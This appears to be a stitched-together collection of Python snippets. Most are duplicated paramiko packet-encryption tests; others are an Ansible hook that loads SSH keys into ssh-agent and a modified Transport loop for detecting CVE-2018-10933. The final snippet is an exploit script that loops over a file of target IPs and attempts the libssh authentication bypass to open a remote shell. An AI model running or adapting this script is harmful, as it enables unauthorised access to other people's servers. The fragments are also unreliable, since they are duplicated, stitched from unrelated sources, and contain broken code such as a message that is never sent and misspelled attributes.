def test_1_write(self): rsock = LoopSocket() wsock = LoopSocket() rsock.link(wsock) p = Packetizer(wsock) p.set_log(util.get_logger("paramiko.transport")) p.set_hexdump(True) cipher = AES.new(b"\x00" * 16, AES.MODE_CBC, b"\x55" * 16) p.set_outbound_cipher(cipher, 16, SHA, 12, b"\x1f" * 20) # message has to be at least 16 bytes long, so we'll have at least one # block of data encrypted that contains zero random padding bytes m = Message() m.add_byte(chr(100).encode()) m.add_int(100) m.add_int(1) m.add_int(900) p.send_message(m) data = rsock.recv(100) # 32 + 12 bytes of MAC = 44 self.assertEquals(44, len(data)) self.assertEquals(b"\x43\x91\x97\xbd\x5b\x50\xac\x25\x87\xc2\xc4\x6b\xc7\xe9\x38\xc0", data[:16])
def test_1_write(self): rsock = LoopSocket() wsock = LoopSocket() rsock.link(wsock) p = Packetizer(wsock) p.set_log(util.get_logger('paramiko.transport')) p.set_hexdump(True) encryptor = Cipher(algorithms.AES(zero_byte * 16), modes.CBC(x55 * 16), backend=default_backend()).encryptor() p.set_outbound_cipher(encryptor, 16, sha1, 12, x1f * 20) # message has to be at least 16 bytes long, so we'll have at least one # block of data encrypted that contains zero random padding bytes m = Message() m.add_byte(byte_chr(100)) m.add_int(100) m.add_int(1) m.add_int(900) p.send_message(m) data = rsock.recv(100) # 32 + 12 bytes of MAC = 44 self.assertEqual(44, len(data)) self.assertEqual( b'\x43\x91\x97\xbd\x5b\x50\xac\x25\x87\xc2\xc4\x6b\xc7\xe9\x38\xc0', data[:16])
def test_1_write(self): rsock = LoopSocket() wsock = LoopSocket() rsock.link(wsock) p = Packetizer(wsock) p.set_log(util.get_logger("paramiko.transport")) p.set_hexdump(True) encryptor = Cipher( algorithms.AES(zero_byte * 16), modes.CBC(x55 * 16), backend=default_backend(), ).encryptor() p.set_outbound_cipher(encryptor, 16, sha1, 12, x1f * 20) # message has to be at least 16 bytes long, so we'll have at least one # block of data encrypted that contains zero random padding bytes m = Message() m.add_byte(byte_chr(100)) m.add_int(100) m.add_int(1) m.add_int(900) p.send_message(m) data = rsock.recv(100) # 32 + 12 bytes of MAC = 44 self.assertEqual(44, len(data)) self.assertEqual( b"\x43\x91\x97\xbd\x5b\x50\xac\x25\x87\xc2\xc4\x6b\xc7\xe9\x38\xc0", data[:16], )
def test_3_closed(self): if sys.platform.startswith("win"): # no SIGALRM on windows return rsock = LoopSocket() wsock = LoopSocket() rsock.link(wsock) p = Packetizer(wsock) p.set_log(util.get_logger("paramiko.transport")) p.set_hexdump(True) encryptor = Cipher( algorithms.AES(zero_byte * 16), modes.CBC(x55 * 16), backend=default_backend(), ).encryptor() p.set_outbound_cipher(encryptor, 16, sha1, 12, x1f * 20) # message has to be at least 16 bytes long, so we'll have at least one # block of data encrypted that contains zero random padding bytes m = Message() m.add_byte(byte_chr(100)) m.add_int(100) m.add_int(1) m.add_int(900) wsock.send = lambda x: 0 from functools import wraps import errno import os import signal class TimeoutError(Exception): def __init__(self, error_message): if hasattr(errno, "ETIME"): self.message = os.sterror(errno.ETIME) else: self.messaage = error_message def timeout(seconds=1, error_message="Timer expired"): def decorator(func): def _handle_timeout(signum, frame): raise TimeoutError(error_message) def wrapper(*args, **kwargs): signal.signal(signal.SIGALRM, _handle_timeout) signal.alarm(seconds) try: result = func(*args, **kwargs) finally: signal.alarm(0) return result return wraps(func)(wrapper) return decorator send = timeout()(p.send_message) self.assertRaises(EOFError, send, m)
def test_3_closed(self): if sys.platform.startswith("win"): # no SIGALRM on windows return rsock = LoopSocket() wsock = LoopSocket() rsock.link(wsock) p = Packetizer(wsock) p.set_log(util.get_logger("paramiko.transport")) p.set_hexdump(True) encryptor = Cipher( algorithms.AES(zero_byte * 16), modes.CBC(x55 * 16), backend=default_backend(), ).encryptor() p.set_outbound_cipher(encryptor, 16, sha1, 12, x1f * 20) # message has to be at least 16 bytes long, so we'll have at least one # block of data encrypted that contains zero random padding bytes m = Message() m.add_byte(byte_chr(100)) m.add_int(100) m.add_int(1) m.add_int(900) wsock.send = lambda x: 0 from functools import wraps import errno import os import signal class TimeoutError(Exception): def __init__(self, error_message): if hasattr(errno, "ETIME"): self.message = os.sterror(errno.ETIME) else: self.messaage = error_message def timeout(seconds=1, error_message="Timer expired"): def decorator(func): def _handle_timeout(signum, frame): raise TimeoutError(error_message) def wrapper(*args, **kwargs): signal.signal(signal.SIGALRM, _handle_timeout) signal.alarm(seconds) try: result = func(*args, **kwargs) finally: signal.alarm(0) return result return wraps(func)(wrapper) return decorator send = timeout()(p.send_message) self.assertRaises(EOFError, send, m)
def test_3_closed(self): rsock = LoopSocket() wsock = LoopSocket() rsock.link(wsock) p = Packetizer(wsock) p.set_log(util.get_logger('paramiko.transport')) p.set_hexdump(True) cipher = AES.new(zero_byte * 16, AES.MODE_CBC, x55 * 16) p.set_outbound_cipher(cipher, 16, sha1, 12, x1f * 20) # message has to be at least 16 bytes long, so we'll have at least one # block of data encrypted that contains zero random padding bytes m = Message() m.add_byte(byte_chr(100)) m.add_int(100) m.add_int(1) m.add_int(900) wsock.send = lambda x: 0 from functools import wraps import errno import os import signal class TimeoutError(Exception): pass def timeout(seconds=1, error_message=os.strerror(errno.ETIME)): def decorator(func): def _handle_timeout(signum, frame): raise TimeoutError(error_message) def wrapper(*args, **kwargs): signal.signal(signal.SIGALRM, _handle_timeout) signal.alarm(seconds) try: result = func(*args, **kwargs) finally: signal.alarm(0) return result return wraps(func)(wrapper) return decorator send = timeout()(p.send_message) self.assertRaises(EOFError, send, m)
def test_3_closed(self): rsock = LoopSocket() wsock = LoopSocket() rsock.link(wsock) p = Packetizer(wsock) p.set_log(util.get_logger('paramiko.transport')) p.set_hexdump(True) cipher = AES.new(zero_byte * 16, AES.MODE_CBC, x55 * 16) p.set_outbound_cipher(cipher, 16, sha1, 12, x1f * 20) # message has to be at least 16 bytes long, so we'll have at least one # block of data encrypted that contains zero random padding bytes m = Message() m.add_byte(byte_chr(100)) m.add_int(100) m.add_int(1) m.add_int(900) wsock.send = lambda x: 0 from functools import wraps import errno import os import signal class TimeoutError(Exception): pass def timeout(seconds=1, error_message=os.strerror(errno.ETIME)): def decorator(func): def _handle_timeout(signum, frame): raise TimeoutError(error_message) def wrapper(*args, **kwargs): signal.signal(signal.SIGALRM, _handle_timeout) signal.alarm(seconds) try: result = func(*args, **kwargs) finally: signal.alarm(0) return result return wraps(func)(wrapper) return decorator send = timeout()(p.send_message) self.assertRaises(EOFError, send, m)
def playbook_on_play_start(self, name): play_vars = merge_hash(self.play.vars, getattr(self.play, 'vars_file_vars', {})) play_vars = merge_hash(play_vars, getattr(self.playbook, 'extra_vars', {})) pem = play_vars.get('creds_ssh_private_key', None) if pem is None: return key = RSAKey.from_private_key(StringIO.StringIO(pem)) hexdigest = unpack('16B', key.get_fingerprint()) hexdigest = ':'.join(['%02x' % x for x in hexdigest]) display('Loading SSH private key %s' % hexdigest) pub = '%s %s %s' % (key.get_name(), key.get_base64(), self.KEY_COMMENT) for x in self.play.tasks() + self.play.handlers(): y = getattr(x, 'module_vars', None) if y: y['creds_ssh_public_key'] = pub ssh_agent = play_vars.get('creds_ssh_agent', True) if not ssh_agent: return msg = Message() msg.add_byte(chr(self.SSH2_AGENTC_ADD_IDENTITY)) msg.add_string(key.get_name()) msg.add_mpint(key.n) msg.add_mpint(key.e) msg.add_mpint(key.d) msg.add_mpint(0) msg.add_mpint(key.p) msg.add_mpint(key.q) msg.add_string(self.KEY_COMMENT) agent = Agent() if agent._conn: agent._send_message(msg) else: warning('Failed to connect to ssh-agent') agent.close()
def test_1_write(self): rsock = LoopSocket() wsock = LoopSocket() rsock.link(wsock) p = Packetizer(wsock) p.set_log(util.get_logger('paramiko.transport')) p.set_hexdump(True) cipher = AES.new('\x00' * 16, AES.MODE_CBC, '\x55' * 16) p.set_outbound_cipher(cipher, 16, SHA, 12, '\x1f' * 20) # message has to be at least 16 bytes long, so we'll have at least one # block of data encrypted that contains zero random padding bytes m = Message() m.add_byte(chr(100)) m.add_int(100) m.add_int(1) m.add_int(900) p.send_message(m) data = rsock.recv(100) # 32 + 12 bytes of MAC = 44 self.assertEquals(44, len(data)) self.assertEquals( '\x43\x91\x97\xbd\x5b\x50\xac\x25\x87\xc2\xc4\x6b\xc7\xe9\x38\xc0', data[:16])
def run(self): """ Run function from paramiko.Transport. This function was copied from Paramiko (paramiko.Transport) in order to implement the CVE-2018-10933 vulnerability. The only change in this function is where we added if ptype == MSG_USERAUTH_SUCCESS. """ # noqa: W503, E722 # (use the exposed "run" method, because if we specify a thread target # of a private method, threading.Thread will keep a reference to it # indefinitely, creating a GC cycle and not letting Transport ever be # GC'd. it's a bug in Thread.) # Hold reference to 'sys' so we can test sys.modules to detect # interpreter shutdown. self.sys = sys # active=True occurs before the thread is launched, to avoid a race _active_threads.append(self) tid = hex(long(id(self)) & xffffffff) if self.server_mode: self._log(DEBUG, "starting thread (server mode): {}".format(tid)) else: self._log(DEBUG, "starting thread (client mode): {}".format(tid)) try: try: self.packetizer.write_all(b(self.local_version + "\r\n")) self._log( DEBUG, "Local version/idstring: {}".format(self.local_version), ) # noqa self._check_banner() # The above is actually very much part of the handshake, but # sometimes the banner can be read but the machine is not # responding, for example when the remote ssh daemon is loaded # in to memory but we can not read from the disk/spawn a new # shell. # Make sure we can specify a timeout for the initial handshake. # Re-use the banner timeout for now. self.packetizer.start_handshake(self.handshake_timeout) self._send_kex_init() self._expect_packet(MSG_KEXINIT) while self.active: if self.packetizer.need_rekey() and not self.in_kex: self._send_kex_init() try: ptype, m = self.packetizer.read_message() except NeedRekeyException: continue # START - This is the part the implements the detection of CVE-2018-10933 if ptype == MSG_USERAUTH_SUCCESS: self.alert(self.sock) continue # END - This is the part the implements the detection of CVE-2018-10933 if ptype == MSG_IGNORE: continue elif ptype == MSG_DISCONNECT: self._parse_disconnect(m) break elif ptype == MSG_DEBUG: self._parse_debug(m) continue if len(self._expected_packet) > 0: if ptype not in self._expected_packet: raise SSHException( "Expecting packet from {!r}, got {:d}".format( self._expected_packet, ptype)) # noqa self._expected_packet = tuple() if (ptype >= 30) and (ptype <= 41): self.kex_engine.parse_next(ptype, m) continue if ptype in self._handler_table: error_msg = self._ensure_authed(ptype, m) if error_msg: self._send_message(error_msg) else: self._handler_table[ptype](self, m) elif ptype in self._channel_handler_table: chanid = m.get_int() chan = self._channels.get(chanid) if chan is not None: self._channel_handler_table[ptype](chan, m) elif chanid in self.channels_seen: self._log( DEBUG, "Ignoring message for dead channel {:d}". format( # noqa chanid), ) else: self._log( ERROR, "Channel request for unknown channel {:d}". format( # noqa chanid), ) break elif (self.auth_handler is not None and # noqa: W504 ptype in self.auth_handler._handler_table): handler = self.auth_handler._handler_table[ptype] handler(self.auth_handler, m) if len(self._expected_packet) > 0: continue else: # Respond with "I don't implement this particular # message type" message (unless the message type was # itself literally MSG_UNIMPLEMENTED, in which case, we # just shut up to avoid causing a useless loop). name = MSG_NAMES[ptype] warning = "Oops, unhandled type {} ({!r})".format( ptype, name) self._log(WARNING, warning) if ptype != MSG_UNIMPLEMENTED: msg = Message() msg.add_byte(cMSG_UNIMPLEMENTED) msg.add_int(m.seqno) self._send_message(msg) self.packetizer.complete_handshake() except SSHException as e: self._log(ERROR, "Exception: " + str(e)) self._log(ERROR, util.tb_strings()) self.saved_exception = e except EOFError as e: self._log(DEBUG, "EOF in transport thread") self.saved_exception = e except socket.error as e: if type(e.args) is tuple: if e.args: emsg = "{} ({:d})".format(e.args[1], e.args[0]) else: # empty tuple, e.g. socket.timeout emsg = str(e) or repr(e) else: emsg = e.args self._log(ERROR, "Socket exception: " + emsg) self.saved_exception = e except Exception as e: self._log(ERROR, "Unknown exception: " + str(e)) self._log(ERROR, util.tb_strings()) self.saved_exception = e _active_threads.remove(self) for chan in list(self._channels.values()): chan._unlink() if self.active: self.active = False self.packetizer.close() if self.completion_event is not None: self.completion_event.set() if self.auth_handler is not None: self.auth_handler.abort() for event in self.channel_events.values(): event.set() try: self.lock.acquire() self.server_accept_cv.notify() finally: self.lock.release() self.sock.close() except: # noqa: E722 # Don't raise spurious 'NoneType has no attribute X' errors when we # wake up during interpreter shutdown. Or rather -- raise # everything *if* sys.modules (used as a convenient sentinel) # appears to still exist. if self.sys.modules is not None: raise
try: # First we're going to assume you can read. with open(sys.argv[1]) as ssh_targets: s = socket.socket() # Let's get rid of the '\n' that infests people who use .readlines() while forcing them to utilize .rstrip() ip_list = ssh_targets.read().splitlines() for ip in ip_list: try: print("Attempting to connect to {}:{}...".format(ip, port)) s.connect((ip, port)) msg = Message() trans = Transport(s) trans.start_client() print("Attempting to send MSG_USERAUTH_SUCCESS...") msg.add_byte(common.cMSG_USERAUTH_SUCCESS) cmd = trans.open_session() print("Attempting to load shell...") cmd.invoke_shell() except Exception as e: print(str(e)) except FileNotFoundError as e: print("File not found: {}".format(sys.argv[1])) except Exception as e: print("Possible PEKBAC error: {}".format(str(e)))